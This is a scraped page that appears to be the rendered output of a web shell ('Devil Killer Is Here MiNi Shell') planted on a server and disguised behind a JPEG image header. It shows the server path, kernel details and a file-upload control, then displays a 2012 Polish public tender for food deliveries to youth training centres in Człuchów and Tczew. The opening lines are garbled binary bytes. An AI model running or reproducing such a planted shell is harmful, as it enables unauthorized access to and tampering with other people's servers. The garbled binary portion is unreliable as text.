JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/472498-N-2012.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla ROSZM w 2013 r.</b><br>
<b>Numer ogłoszenia: 472498 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/ http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla ROSZM w 2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla Rejonowego Ośrodka Szkolenia Zawodowego Młodzieży  od 1 stycznia 2013 r.  do dnia 31 grudnia 2013 roku do: 
- Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4- zadanie nr 1, 2, 3, 4, 5,6, 7, 8, 9, 10, 11, 12, 13, 14.15,16,17 
- Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 - zadanie nr,  18, 19, 20, 21, 22, 23 ,24, 25, 26, 27, 28, 29, 30, 31.  
2.	Przedmiot zamówienia podzielonego na trzydzieści jeden  zadań częściowych:
------------------------------CZŁUCHÓW----------------------------ZADANIA 1-17
Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - drób 
Zadanie nr 9 - wędliny i prod. wędliniarskie
Zadanie nr 10 - pasztety i konserwy  
Zadanie nr 11 - rybi i przetwory  
Zadanie nr 12- pieczywo i ciasto 
Zadanie nr 13 - produkty skrobi  
Zadanie nr 14 - produkty spożywcze różne. 
Zadanie nr 15- oleje i tłuszcze roślinne  
Zadanie nr 16 - produkty mleczarskie   
Zadanie nr 17 - napoje
------------------------------TCZEW-----------------------ZADANIA 18-31 
Zadanie nr 18 - owoce świeże 
Zadanie nr 19 - owoce przetworzone  
Zadanie nr 20 - warzywa świeże 
Zadanie nr 21 - warzywa przetworzone 
Zadanie nr 22 - mrożonki 
Zadanie nr 23 - jaja
Zadanie nr 24 - mięso i produkty mięsne 
Zadanie nr 25 - ryby i przetwory konserwowe 
Zadanie nr 26 -pieczywo 
Zadanie nr 27 - produkty skrobi - mąka  
Zadanie nr 28 -produkty spożywcze 
Zadanie nr 29- oleje i tłuszcze roślinne 
Zadanie nr 30 - produkty mleczarskie  
Zadanie nr 31 - napoje   
3.	Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do: 
A.	Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE OD 1 DO 17. 
B.	Ośrodka Szkolenia i Wychowania w Tczewie , ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE OD 18 DO 21. 
4.	Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
5.	Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
6.	Cykliczne dostawy  będą realizowane jak następuje:  
7.	Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
8.	Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
9.	Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
10.	Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
11.	Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie. Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia.
12.	W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
13.	Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
14.	Do składania zamówień Zamawiający upoważni wybranego pracownika.
15.	Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
16.	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
17.	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
18.	Wykonawca ma obowiązek wystawiać każdorazowo faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
19.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-1, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.86.00.00-0, 03.14.25.00-3, 15.81.00.00-9, 15.80.00.00-6, 15.13.11.30-5, 15.10.00.00-9, 15.11.90.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 31.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, będzie polegał na wiedzy i doświadczeniu i/lub na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp., niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu:
A.	pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału),
UWAGA: W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu innego podmiotu i/lub będzie polegał na zasobach innego podmiotu i złoży w stosunku do tych warunków pisemne zobowiązanie o którym mowa powyżej - oznacza obowiązkowy udział innego podmiotu w realizacji części zamówienia.
B.	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 pkt 1-4 PzP składa przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.

12.5 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.

1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp.                   W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
2.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
3.	Wykonawcy, o których mowa w punkcie 1 składają jedną ofertę, przy czym:
A.	Załącznik nr 3 do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
B.	Załącznik nr 2 (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
13.	WYMAGANA ZAWARTOŚĆ OFERTY ORAZ DOKUMENTY I OŚWIADCZENIA WYMAGANE OD WYKONAWCY W PRZEDMIOTOWYM POSTĘPOWANIU.
1.	Wypełniony formularz oferty i formularze cenowe zgodnie ze wzorem Załącznik nr 1. 

Formularz oferty, formularz cenowy oraz pozostałe oświadczenia i dokumenty (za wyjątkiem sytuacji opisanych w pkt. 12.5), muszą być podpisane (czytelnie lub nieczytelnie wraz z pieczątką imienną) przez osobę uprawnioną do występowania w imieniu Wykonawcy, tj. przez osobę uprawnioną do składania oświadczeń woli i zaciągania zobowiązań, wskazaną w dokumencie upoważniającym do występowania w obrocie prawnym. W przypadku złożenia oferty, bądź też dokonania innych czynności przez osobę lub osoby nie uwidocznione w odpisie z KRS-u dla spółek prawa handlowego, bądź nie będącą właścicielem firmy w przypadku innej formy prawnej, należy dołączyć prawnie skuteczne pełnomocnictwo lub upoważnienie osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów.
2.	Oświadczenie Wykonawcy, o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 uPzp załącznik nr 3.
3.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 uPzp załącznik nr 2.
4.	Zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów z zakresu wiedzy i doświadczenia, na okres korzystania z nich przy wykonywaniu zamówienia, zgodnie z zapisem w rozdziale 12.2 pkt 3  - o ile dotyczy.
5.	W przypadku Wykonawców występujących wspólnie (konsorcjum), oprócz w/w dokumentów należy dołączyć:
A.	Pełnomocnictwo lidera - pełnomocnika do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o zamówienie, a w szczególności do złożenia oferty lub do złożenia oferty i podpisania umów w imieniu konsorcjum. Fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów (np. pełnomocnictwa). Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu nazwa i adres Wykonawcy należy wpisać oprócz danych pełnomocnika konsorcjum, również dane dotyczące wszystkich członków konsorcjum - wszystkich Wykonawców składających ofertę wspólną. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem wymienionym w pełnomocnictwie występującym jako reprezentant pozostałych konsorcjantów.
B.	Oświadczenie wszystkich członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania.
6.	Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
A.	Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
B.	Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
C.	W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
D.	W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/ohp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 605, VI piętro - sekretariat ogólny. ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat) 6 piętro, pokój 605..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas owoc	szt	6
arbuz	kg	50
banany	kg	50
brzoskwinie	kg	5
cytryny	kg	10
czereśnie	kg	2
gruszki	kg	5
jabłka	kg	65
kiwi	kg	10
kiwi	szt	20
nektaryny	kg	5
maliny 500g	szt	4
maliny	kg	2
mandarynki	kg	15
pomarancza	kg	10
pomarańcza siatka	kg	10
rabarbar	kg	3
śliwki	kg	3
truskawki	kg	3
winogrona jasne	kg	15
winogrona ciemne	kg	15
wisnie	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany450g	szt	20
brzoskwinie kons.0.9	szt	15
Dżem 7 kg	szt	2
Dżem  270 g	szt	65
dzem jednorazowy 25g	szt	120
kompot agrestowy 0,9l	szt	10
kompot wiśniowy 0,9 l	szt	9
marmolada owocowa 7kg	szt	1
owoce do ciasta 3 kg(puszka)	szt	1
sok owocowy 2l (różne smaki-pomarańcz grejfrut, jabłkowy, cz.pożeczka, mixitp)	szt	15
sok owocowy 1l (różne smaki-pomarań, gruszka, wiśnia, grejfrut,mix itp.)	szt	10
sok warzywno-owocowy (marchew-trusk-banan, Marchew-malina-banan, marchew-jabłko-banan itp.	szt	120
syrop owocowy 0,5l	szt	50
syrop owocowy 1l	szt	22
rodzynki suszone 100g	szt	10
rodzynki suszone 0.5 kg	szt	3
śliwki suszone 100g	szt	5
Żurawina 0,17 l	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	8
burak	kg	100
brokuł	szt	3
cebula	kg	150
cebula młoda	kg	30
cebula czerwona	kg	3
czosnek	szt	25
czosnek	kg	3
fasola jaś 0,5kg	szt	20
fasola drobna 5kg	kg	1
fasola drobna 0,4 kg	szt	3
